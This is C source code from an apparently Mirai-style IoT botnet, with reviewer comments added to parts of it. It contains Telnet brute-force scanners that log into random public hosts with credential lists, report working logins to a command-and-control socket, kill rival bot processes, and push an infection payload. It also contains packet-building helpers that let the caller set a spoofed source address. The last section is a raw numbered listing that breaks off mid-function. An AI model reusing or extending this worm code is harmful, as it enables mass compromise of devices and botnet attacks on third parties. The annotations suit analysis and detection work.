   * Returns whatever getRandomPublicIP() returns (an in_addr_t).
   */
  in_addr_t findARandomIP()
  {
      if(rangechoice < 1 || rangechoice > 2)
      {
          return getRandomPublicIP();
      }
      else
      {
          if(rangechoice == 1){
              return getRandomPublicIP();
          }
          else if(rangechoice == 2)
          {
              return getRandomPublicIP();
          }
          else
          {
              return getRandomPublicIP();
          }
      }
  }
  /*
   * getRandomIP - build an address that keeps the masked bits of ourIP and
   * randomises the rest.
   *
   * netmask: bits to keep from ntohl(ourIP.s_addr). The remaining bits come
   *          from rand_cmwc(). ourIP and rand_cmwc are defined outside this
   *          view.
   *
   * Returns the combined value. ntohl() is applied to ourIP and nothing here
   * converts back, so the result is presumably in host byte order; callers
   * are not visible here, so this is unconfirmed.
   */
  in_addr_t getRandomIP(in_addr_t netmask) {
      in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
      return tmp ^ ( rand_cmwc() & ~netmask);
  }
  /*
   * csum - 16-bit one's-complement checksum over a byte range.
   *
   * buf:   start of the data, read as native 16-bit words.
   * count: length in BYTES; a trailing odd byte is added as-is.
   *
   * Returns the complement of the end-around-carry folded sum.
   */
  unsigned short csum (unsigned short *buf, int count) {
      uint64_t acc = 0;
      unsigned short *word = buf;
      int remaining;

      /* Consume whole 16-bit words first. */
      for (remaining = count; remaining > 1; remaining -= 2) {
          acc += *word++;
      }
      /* One byte left over: add it unshifted. */
      if (remaining > 0) {
          acc += *(unsigned char *)word;
      }
      /* Fold the carries back into the low 16 bits. */
      while ((acc >> 16) != 0) {
          acc = (acc >> 16) + (acc & 0xffff);
      }
      return (uint16_t)(~acc);
  }
  /*
   * tcpcsum - checksum over a locally built pseudo-header plus the TCP header.
   *
   * iph:  IP header supplying saddr and daddr for the pseudo-header.
   * tcph: TCP header copied after the pseudo-header.
   *
   * The pseudo-header length field is htons(sizeof(struct tcphdr)) and only
   * sizeof(struct tcphdr) bytes are copied, so no payload or option bytes are
   * covered. The two parts are copied into a heap buffer, csum() is run over
   * it, and the buffer is freed before returning.
   *
   * Returns the value produced by csum().
   *
   * NOTE(review): the address fields are declared unsigned long, so
   * sizeof(struct tcp_pseudo) follows the platform ABI. The malloc() result
   * is used without a NULL check, and total_len is assigned but never read.
   */
  unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
      struct tcp_pseudo {
          unsigned long src_addr;
          unsigned long dst_addr;
          unsigned char zero;
          unsigned char proto;
          unsigned short length;
      } pseudohead;
      unsigned short total_len = iph->tot_len;
      pseudohead.src_addr=iph->saddr;
      pseudohead.dst_addr=iph->daddr;
      pseudohead.zero=0;
      pseudohead.proto=IPPROTO_TCP;
      pseudohead.length=htons(sizeof(struct tcphdr));
      int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
      unsigned short *tcp = malloc(totaltcp_len);
      memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
      memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
      unsigned short output = csum(tcp,totaltcp_len);
      free(tcp);
      return output;
  }
  /*
   * makeIPPacket - fill in the fixed fields of an IPv4 header.
   *
   * iph:        header to populate (written in place).
   * dest:       stored unchanged in iph->daddr.
   * source:     stored unchanged in iph->saddr, so the caller chooses the
   *             source address that goes on the wire.
   * protocol:   stored in iph->protocol.
   * packetSize: added to sizeof(struct iphdr) to form iph->tot_len.
   *
   * The header is 20 bytes with no options (ihl = 5), TTL is MAXTTL and the ID
   * comes from rand_cmwc() (defined outside this view). tot_len is stored as
   * computed, without htons(). check is left at 0; nothing in this function
   * computes the IP checksum.
   */
  void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
      iph->ihl = 5;
      iph->version = 4;
      iph->tos = 0;
      iph->tot_len = sizeof(struct iphdr) + packetSize;
      iph->id = rand_cmwc();
      iph->frag_off = 0;
      iph->ttl = MAXTTL;
      iph->protocol = protocol;
      iph->check = 0;
      iph->saddr = source;
      iph->daddr = dest;
  }
  /*
   * sclose - close a descriptor unless it is one of the standard streams.
   *
   * Descriptors below 3 (including negative values) are left alone and 1 is
   * returned. Otherwise close() is called, its result is ignored, and 0 is
   * returned.
   */
  int sclose(int fd) {
      if (fd >= 3) {
          close(fd);
          return 0;
      }
      return 1;
  }
  /*
   * BCMscanner - Telnet login scanner driven by a per-slot state machine.
   *
   * Loops forever over a fixed array of 312 telstate_t slots. Each slot moves
   * through these states:
   *   0  take a target from BCMSCAN() and start a non-blocking connect to TCP/23
   *   1  select() for up to 10 ms until the connect finishes, then check SO_ERROR
   *   2  read until read_until_response() reports a match against `phone`
   *   3  send the literal "admin\r\n"
   *   4  read again against `phone`
   *   5  send the literal "admin\r\n" a second time
   *   6  read against `advances2`; unless contains_fail() matches, report the
   *      host on the control socket (mainCommSock)
   *   7  send shell command lines and Busybox_Payload into the remote session
   *
   * BCMSCAN, read_until_response, contains_fail, sockprintf, reset_telstate,
   * get_telstate_host, RemoveTempDirs, rand_cmwc, struct telstate_t and the
   * tables phone, advances2, Telnet_Usernames, Telnet_Passwords,
   * Temp_Directorys, Bot_Killer_Binarys and Busybox_Payload are defined outside
   * this view; what is said about them here is inferred from how they are used.
   *
   * Detection-relevant behaviour visible in this function:
   *   - many concurrent outbound connections to port 23 from one process;
   *   - the login exchange always sends the fixed string "admin" twice;
   *   - control-channel lines begin with "[ BCM ] " or "REPORT ";
   *   - the credentials printed in those lines are Telnet_Usernames and
   *     Telnet_Passwords at the slot's usernameInd/passwordInd. This function
   *     never changes those indices after zeroing the slot, so the reported
   *     pair need not be the "admin"/"admin" pair that was actually sent.
   *
   * The locals j, buf, cur_dir and line are declared but not used.
   */
  void BCMscanner() {
      int maxfds = 312, i, res, j, valopt;
      int max = maxfds;
      char buf[128], cur_dir;
      fd_set fdset;
      struct timeval tv;
      socklen_t lon;
      srand(time(NULL) ^ rand_cmwc());
      char line[256];
      char* buffer;
      struct sockaddr_in dest_addr;
      dest_addr.sin_family = AF_INET;
      dest_addr.sin_port = htons(23); /* Telnet */
      memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
      /* A single 313-byte receive buffer; every slot's sockbuf points at it. */
      buffer = malloc(312 + 1);
      memset(buffer, 0, 312 + 1);
      struct telstate_t fds[max];
      /* Partial clear only; the loop below clears each element in full. */
      memset(fds, 0, max * (sizeof(int) + 1));
      for(i = 0; i < max; i++) {
          memset(&(fds[i]), 0, sizeof(struct telstate_t));
          fds[i].complete = 1; /* 1 = slot needs a fresh target */
          fds[i].sockbuf = buffer; }
      while(1) {
          for(i = 0; i < max; i++) {
              /* tTimeout == 0 means "start timing from now". */
              if(fds[i].tTimeout == 0) {
                  fds[i].tTimeout = time(NULL); }
              switch(fds[i].state) {
                  /* State 0: choose a target and begin the connect. */
                  case 0: {
                      if(fds[i].complete == 1) {
                          /* Wipe the slot but keep its buffer pointer. */
                          char *tmp = fds[i].sockbuf;
                          memset(&(fds[i]), 0, sizeof(struct telstate_t));
                          fds[i].sockbuf = tmp;
                          fds[i].ip = BCMSCAN(); }
                      dest_addr.sin_family = AF_INET;
                      dest_addr.sin_port = htons(23);
                      memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
                      dest_addr.sin_addr.s_addr = fds[i].ip;
                      fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
                      if(fds[i].fd == -1) continue;
                      /* Non-blocking, so one loop can drive all slots. */
                      fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
                      if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
                          sclose(fds[i].fd);
                          fds[i].complete = 1; }
                      else {
                          fds[i].state = 1;
                          fds[i].tTimeout = 0;
                      }
                  }
                  break;
                  /* State 1: wait for the connect to complete (6 s budget). */
                  case 1: {
                      FD_ZERO(&fdset);
                      FD_SET(fds[i].fd, &fdset);
                      tv.tv_sec = 0;
                      tv.tv_usec = 10000;
                      res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
                      if(res == 1) {
                          lon = sizeof(int);
                          valopt = 0;
                          /* Writable does not mean connected: SO_ERROR carries the result. */
                          getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
                          if(valopt) {
                              sclose(fds[i].fd);
                              fds[i].state = 0;
                              fds[i].complete = 1;
                          } else {
                              /* Connected: back to blocking mode for the login dialogue. */
                              fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
                              fds[i].tTimeout = 0;
                              fds[i].bufUsed = 0;
                              memset(fds[i].sockbuf, 0, 312);
                              fds[i].state = 2;
                          } continue; }
                      else if(res == -1) {
                          sclose(fds[i].fd);
                          fds[i].state = 0;
                          fds[i].complete = 1;
                          continue; }
                      if(fds[i].tTimeout + 6 < time(NULL)) {
                          sclose(fds[i].fd);
                          fds[i].state = 0;
                          fds[i].complete = 1;
                      }
                  }
                  break;
                  /* State 2: wait for the first prompt (matched against `phone`). */
                  case 2: {
                      if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, phone)) {
                          if(contains_fail(fds[i].sockbuf)) {
                              fds[i].state = 0;
                          } else {
                              fds[i].state = 3; }
                          continue; }
                      if(fds[i].tTimeout + 6 < time(NULL)) {
                          fds[i].state = 0;
                          fds[i].complete = 1;
                      }
                  }
                  break;
                  /* State 3: first fixed login string. */
                  case 3: {
                      if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
                          fds[i].state = 0;
                          fds[i].complete = 1;
                          continue; }
                      fds[i].state = 4;
                  }
                  break;
                  /* State 4: wait for the next prompt. */
                  case 4: {
                      if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, phone)) {
                          if(contains_fail(fds[i].sockbuf)) {
                              fds[i].state = 0;
                          } else {
                              fds[i].state = 5; }
                          continue; }
                      if(fds[i].tTimeout + 6 < time(NULL)) {
                          fds[i].state = 0;
                          fds[i].complete = 1;
                      }
                  }
                  break;
                  /* State 5: second fixed login string. */
                  case 5: {
                      if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
                          fds[i].state = 0;
                          fds[i].complete = 1;
                          continue; }
                      fds[i].state = 6; }
                  break;
                  /* State 6: judge the login result and report it to the control socket. */
                  case 6: {
                      if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, advances2)) {
                          fds[i].tTimeout = time(NULL);
                          if (contains_fail(fds[i].sockbuf)) {
                              fds[i].state = 0;
                          } else {
                              /* Any response that is not a recognised failure is reported as a success. */
                              sockprintf(mainCommSock, "[ BCM ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                              sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                              fds[i].state = 7;
                          } continue; }
                      if (fds[i].tTimeout + 7 < time(NULL)) {
                          fds[i].state = 0;
                          fds[i].complete = 1;
                      }
                  }
                  break;
                  /* State 7: command lines written into the authenticated session.
                     The "rm -rf" and "pkill -9 ...;killall -9 ..." strings arrive
                     on the remote side as typed shell input, so they show up in
                     Telnet session captures. */
                  case 7: {
                      char RemoveTheTempDirs [80];
                      sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
                      if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
                      /* Runs on the scanning host itself; the body is not visible here. */
                      RemoveTempDirs();
                      sockprintf(mainCommSock, "[ BCM ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                      char killtheproccesses[80];
                      sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
                      if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
                      sockprintf(mainCommSock, "[ BCM ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);

                      fds[i].tTimeout = time(NULL);
                      if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
                          sclose(fds[i].fd);
                          fds[i].state = 0;
                          fds[i].complete = 1;
                          continue; }
                      fds[i].complete = 3;
                      /* tTimeout was set a few lines above, so this 60 s test is
                         normally false and the slot stays in state 7; the same
                         command lines are then sent again on the next pass. */
                      if(fds[i].tTimeout + 60 < time(NULL)) {
                          if(fds[i].complete !=3){
                          }
                          fds[i].state = 0;
                          fds[i].complete = 1;
                      }
                      break;
                  }
              }
          }
      }
  }
  /*
   * TelnetScanner - Telnet credential scanner driven by a per-slot state machine.
   *
   * wait_usec: microsecond timeout used for select() in state 1 and passed to
   *            read_until_response() in the read states.
   * maxfds:    upper bound on the number of concurrent slots; the actual count
   *            is min(getdtablesize() - 100, maxfds).
   *
   * Never returns. Each slot moves through these states:
   *   0  take a target from findARandomIP() or step to the next credential
   *      index, then start a non-blocking connect to TCP/23
   *   1  wait for the connect to finish, then check SO_ERROR
   *   2  read until a match against `advances`
   *   3  send Telnet_Usernames[usernameInd] followed by "\r\n"
   *   4  read again against `advances`
   *   5  send Telnet_Passwords[passwordInd] followed by "\r\n"
   *   6  read against `advances2`; on contains_success() report the host and
   *      credentials on the control socket (mainCommSock)
   *   7  send "rm -rf ..." and "pkill/killall ..." command lines
   *   8  send "sh", "shell" and Busybox_Payload, then look for the marker
   *      "CONNECTED" in the response
   *
   * findARandomIP is defined earlier in this file. reset_telstate,
   * advance_telstate, read_until_response, contains_fail, contains_success,
   * sockprintf, get_telstate_host, RemoveTempDirs, struct telstate_t and the
   * tables advances, advances2, Telnet_Usernames, Telnet_Passwords,
   * Temp_Directorys, Bot_Killer_Binarys and Busybox_Payload are defined outside
   * this view; what is said about them here is inferred from how they are used.
   *
   * Detection-relevant behaviour visible in this function:
   *   - many concurrent outbound connections to port 23 from one process;
   *   - usernameInd and passwordInd are incremented together, so the list
   *     entries are tried as same-index pairs, one new connection per pair;
   *   - control-channel lines begin with "[ TELNET ] " or "REPORT " and carry
   *     the target address and the credential pair in clear text;
   *   - the remote session is checked for the literal "CONNECTED".
   *
   * The locals num_tmps, j, buf, cur_dir and line are declared but not used.
   */
  void TelnetScanner(int wait_usec, int maxfds){
      int max = getdtablesize() - 100, i, res, num_tmps, j;
      char buf[128], cur_dir;
      if (max > maxfds)
          max = maxfds;
      fd_set fdset;
      struct timeval tv;
      socklen_t lon;
      int valopt;
      char line[256];
      char* buffer;
      struct sockaddr_in dest_addr;
      dest_addr.sin_family = AF_INET;
      dest_addr.sin_port = htons(23); /* Telnet */
      memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
      /* A single receive buffer; every slot's sockbuf points at it. */
      buffer = malloc(SOCKBUF_SIZE + 1);
      memset(buffer, 0, SOCKBUF_SIZE + 1);
      struct telstate_t fds[max];
      /* Partial clear only; the loop below clears each element in full. */
      memset(fds, 0, max * (sizeof(int) + 1));
      for(i = 0; i < max; i++)
      {
          memset(&(fds[i]), 0, sizeof(struct telstate_t));
          fds[i].complete = 1; /* 1 = slot needs a fresh target */
          fds[i].sockbuf = buffer;
      }
      while(1) {
          for(i = 0; i < max; i++) {
              /* tTimeout == 0 means "start timing from now". */
              if(fds[i].tTimeout == 0) {
                  fds[i].tTimeout = time(NULL);
              }
              switch(fds[i].state) {
                  /* State 0: new target, or next credential pair for the same target. */
                  case 0:
                  {
                      if(fds[i].complete == 1)
                      {
                          /* Wipe the slot (indices return to 0) but keep its buffer pointer. */
                          char *tmp = fds[i].sockbuf;
                          memset(&(fds[i]), 0, sizeof(struct telstate_t));
                          fds[i].sockbuf = tmp;
                          fds[i].ip = findARandomIP();
                      }
                      else if(fds[i].complete == 0)
                      {
                          /* Both indices advance in lockstep; reaching the end
                             of either list abandons this target. */
                          fds[i].usernameInd++;
                          fds[i].passwordInd++;
                          if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *))
                          {
                              fds[i].complete = 1;
                              continue;
                          }
                          if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *))
                          {
                              fds[i].complete = 1;
                              continue;
                          }
                      }
                      dest_addr.sin_family = AF_INET;
                      dest_addr.sin_port = htons(23);
                      memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
                      dest_addr.sin_addr.s_addr = fds[i].ip;
                      fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
                      if(fds[i].fd == -1) continue;
                      /* Non-blocking, so one loop can drive all slots. */
                      fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
                      if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
                      {
                          reset_telstate(&fds[i]);
                      }
                      else
                      {
                          advance_telstate(&fds[i], 1);
                      }
                  }
                  break;
                  /* State 1: wait for the connect to complete (7 s budget). */
                  case 1:
                  {
                      FD_ZERO(&fdset);
                      FD_SET(fds[i].fd, &fdset);
                      tv.tv_sec = 0;
                      tv.tv_usec = wait_usec;
                      res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
                      if(res == 1) {
                          fds[i].tTimeout = 0;
                          lon = sizeof(int);
                          valopt = 0;
                          /* Writable does not mean connected: SO_ERROR carries the result. */
                          getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
                          if(valopt)
                          {
                              reset_telstate(&fds[i]);
                          }
                          else
                          {
                              /* Connected: back to blocking mode for the login dialogue. */
                              fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
                              advance_telstate(&fds[i], 2);
                          }
                          continue;
                      }
                      else if(res == -1)
                      {
                          reset_telstate(&fds[i]);
                          continue;
                      }
                      if(fds[i].tTimeout + 7 < time(NULL))
                      {
                          reset_telstate(&fds[i]);
                      }
                  }
                  break;
                  /* State 2: wait for the login prompt. */
                  case 2:
                  {
                      if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
                      {
                          fds[i].tTimeout = time(NULL);
                          if(contains_fail(fds[i].sockbuf))
                          {
                              advance_telstate(&fds[i], 0);
                          }
                          else
                          {
                              advance_telstate(&fds[i], 3);
                          }
                          continue;
                      }
                      if(fds[i].tTimeout + 7 < time(NULL))
                      {
                          reset_telstate(&fds[i]);
                      }
                  }
                  break;
                  /* State 3: send the current username. */
                  case 3:
                  {
                      if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
                      {
                          reset_telstate(&fds[i]);
                          continue;
                      }
                      if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
                      {
                          reset_telstate(&fds[i]);
                          continue;
                      }
                      advance_telstate(&fds[i], 4);
                  }
                  break;
                  /* State 4: wait for the password prompt. */
                  case 4:
                  {
                      if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
                      {
                          fds[i].tTimeout = time(NULL);
                          if(contains_fail(fds[i].sockbuf))
                          {
                              advance_telstate(&fds[i], 0);
                          }
                          else
                          {
                              advance_telstate(&fds[i], 5);
                          }
                          continue;
                      }
                      if(fds[i].tTimeout + 7 < time(NULL))
                      {
                          reset_telstate(&fds[i]);
                      }
                  }
                  break;
                  /* State 5: send the current password. */
                  case 5:
                  {
                      if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
                      {
                          reset_telstate(&fds[i]);
                          continue;
                      }
                      if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
                      {
                          reset_telstate(&fds[i]);
                          continue;
                      }
                      advance_telstate(&fds[i], 6);
                  }
                  break;
                  /* State 6: judge the login result and report it to the control socket. */
                  case 6:
                  {
                      if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
                      {
                          fds[i].tTimeout = time(NULL);
                          if(contains_fail(fds[i].sockbuf))
                          {
                              advance_telstate(&fds[i], 0);
                          }
                          else if(contains_success(fds[i].sockbuf))
                          {
                              if(fds[i].complete == 2)
                              {
                                  advance_telstate(&fds[i], 7);
                              }
                              else
                              {
                                  /* Target address and working credentials cross the
                                     control channel in clear text here. */
                                  sockprintf(mainCommSock, "[ TELNET ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                                  sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                                  advance_telstate(&fds[i], 7);
                              }
                          }
                          else
                          {
                              reset_telstate(&fds[i]);
                          }
                          continue;
                      }
                      if(fds[i].tTimeout + 7 < time(NULL))
                      {
                          reset_telstate(&fds[i]);
                      }
                  }
                  break;
                  /* State 7: command lines written into the authenticated session.
                     They arrive on the remote side as typed shell input, so they
                     show up in Telnet session captures. */
                  case 7:
                  {
                      char RemoveTheTempDirs [80];
                      sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
                      if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
                      /* Runs on the scanning host itself; the body is not visible here. */
                      RemoveTempDirs();
                      sockprintf(mainCommSock, "[ TELNET ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                      char killtheproccesses[80];
                      sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
                      if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
                      sockprintf(mainCommSock, "[ TELNET ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                      advance_telstate(&fds[i], 8);
                  }
                  break;
                  /* State 8: payload delivery and result check (10 s budget). */
                  case 8:
                  {
                      fds[i].tTimeout = time(NULL);
                      /* The two if statements below have empty bodies, so the
                         results of these sends are ignored. */
                      if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
                      if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
                      if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
                      sockprintf(mainCommSock, "[ TELNET ] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                      if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "CONNECTED"))
                      {
                          /* complete == 3 marks "success already reported" for this slot. */
                          if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
                          {
                              sockprintf(mainCommSock, "[ TELNET ] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                              fds[i].complete = 3;
                          }
                      }
                      /* tTimeout was set at the top of this case, so this test is
                         normally false within the same pass. */
                      if(fds[i].tTimeout + 10 < time(NULL))
                      {
                          if(fds[i].complete!=3)
                          {
                              sockprintf(mainCommSock, "[ TELNET ] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                          }
                          reset_telstate(&fds[i]);
                      }
                      break;
                  }
              }
          }
      }
  }
  1944. void MiraiScanner(int wait_usec, int maxfds){
  1945. int max = getdtablesize() - 100, i, res, num_tmps, j;
  1946. char buf[128], cur_dir;
  1947. if (max > maxfds)
  1948. max = maxfds;
  1949. fd_set fdset;
  1950. struct timeval tv;
  1951. socklen_t lon;
  1952. int valopt;
  1953. char line[256];
  1954. char* buffer;
  1955. struct sockaddr_in dest_addr;
  1956. dest_addr.sin_family = AF_INET;
  1957. dest_addr.sin_port = htons(23);
  1958. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1959. buffer = malloc(SOCKBUF_SIZE + 1);
  1960. memset(buffer, 0, SOCKBUF_SIZE + 1);
  1961. struct telstate_t fds[max];
  1962. memset(fds, 0, max * (sizeof(int) + 1));
  1963. for(i = 0; i < max; i++) {
  1964. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1965. fds[i].complete = 1;
  1966. fds[i].sockbuf = buffer;
  1967. }
  1968. while(1) {
  1969. for(i = 0; i < max; i++) {
  1970. if(fds[i].tTimeout == 0) {
  1971. fds[i].tTimeout = time(NULL);
  1972. }
  1973. switch(fds[i].state) {
  1974. case 0:
  1975. {
  1976. if(fds[i].complete == 1)
  1977. {
  1978. char *tmp = fds[i].sockbuf;
  1979. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1980. fds[i].sockbuf = tmp;
  1981. fds[i].ip = MiraiIPRanges();
  1982. }
  1983. else if(fds[i].complete == 0)
  1984. {
  1985. fds[i].usernameInd++;
  1986. fds[i].passwordInd++;
  1987. if(fds[i].passwordInd == sizeof(Mirai_Passwords) / sizeof(char *))
  1988. {
  1989. fds[i].complete = 1;
  1990. }
  1991. if(fds[i].usernameInd == sizeof(Mirai_Usernames) / sizeof(char *))
  1992. {
  1993. fds[i].complete = 1;
  1994. continue;
  1995. }
  1996. }
  1997. dest_addr.sin_family = AF_INET;
  1998. dest_addr.sin_port = htons(23);
  1999. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2000. dest_addr.sin_addr.s_addr = fds[i].ip;
  2001. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  2002. if(fds[i].fd == -1) continue;
  2003. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  2004. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
  2005. {
  2006. reset_telstate(&fds[i]);
  2007. }
  2008. else
  2009. {
  2010. advance_telstate(&fds[i], 1);
  2011. }
  2012. }
  2013. break;
  2014. case 1:
  2015. {
  2016. FD_ZERO(&fdset);
  2017. FD_SET(fds[i].fd, &fdset);
  2018. tv.tv_sec = 0;
  2019. tv.tv_usec = wait_usec;
  2020. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  2021. if(res == 1)
  2022. {
  2023. fds[i].tTimeout = time(NULL);
  2024. lon = sizeof(int);
  2025. valopt = 0;
  2026. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  2027. if(valopt)
  2028. {
  2029. reset_telstate(&fds[i]);
  2030. }
  2031. else
  2032. {
  2033. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  2034. advance_telstate(&fds[i], 2);
  2035. }
  2036. continue;
  2037. }
  2038. else if(res == -1)
  2039. {
  2040. reset_telstate(&fds[i]);
  2041. continue;
  2042. }
  2043. if(fds[i].tTimeout + 7 < time(NULL))
  2044. {
  2045. reset_telstate(&fds[i]);
  2046. }
  2047. }
  2048. break;
  2049. case 2:
  2050. {
  2051. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  2052. {
  2053. fds[i].tTimeout = time(NULL);
  2054. if(contains_fail(fds[i].sockbuf))
  2055. {
  2056. advance_telstate(&fds[i], 0);
  2057. }
  2058. else
  2059. {
  2060. advance_telstate(&fds[i], 3);
  2061. }
  2062. continue;
  2063. }
  2064. if(fds[i].tTimeout + 7 < time(NULL))
  2065. {
  2066. reset_telstate(&fds[i]);
  2067. }
  2068. }
  2069. break;
  2070. case 3:
  2071. {
  2072. if(send(fds[i].fd, Mirai_Usernames[fds[i].usernameInd], strlen(Mirai_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
  2073. {
  2074. reset_telstate(&fds[i]);
  2075. continue;
  2076. }
  2077. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  2078. {
  2079. reset_telstate(&fds[i]);
  2080. continue;
  2081. }
  2082. advance_telstate(&fds[i], 4);
  2083. }
  2084. break;
  2085. case 4:
  2086. {
  2087. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  2088. {
  2089. fds[i].tTimeout = time(NULL);
  2090. if(contains_fail(fds[i].sockbuf))
  2091. {
